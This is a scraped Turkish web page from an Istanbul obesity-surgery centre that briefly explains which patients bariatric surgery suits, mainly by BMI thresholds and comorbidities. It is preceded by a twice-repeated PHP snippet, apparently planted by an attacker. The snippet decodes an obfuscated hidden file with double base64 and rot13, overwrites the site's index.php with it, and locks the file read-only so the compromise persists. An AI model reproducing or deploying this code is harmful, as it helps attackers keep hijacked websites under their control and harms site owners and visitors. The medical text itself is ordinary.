$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Kimlere Uygundur - İstanbul Obezite Cerrahisi Merkezi

Skip links

Kimlere Uygundur

Obezite cerrahisi beden kitle indeksi 40 ve üzeri olan,  uzman denetiminde tıbbi beslenme, egzersiz ve medikal tedavi gibi yöntemlerle zayıflayamayan hastalara önerilmektedir. Bunun yanında beden kitle indeksi 35 üzerinde olan, yüksek tansiyon, diyabet, uyku apnesi gibi hastanın yaşam kalitesini ve süresini etkileyen hastalara da önerilebilmektedir.

Hastaya hangi ameliyatın uygun olduğu, yeme alışkanlıkları, kilo geçmişi, yandaş hastalıklar gibi pek çok detay değerlendirilerek ve multidisipliner bir ekip tarafından yapılan çeşitli muayene ve tetkikler sonucunda belirlenmektedir

Bitnami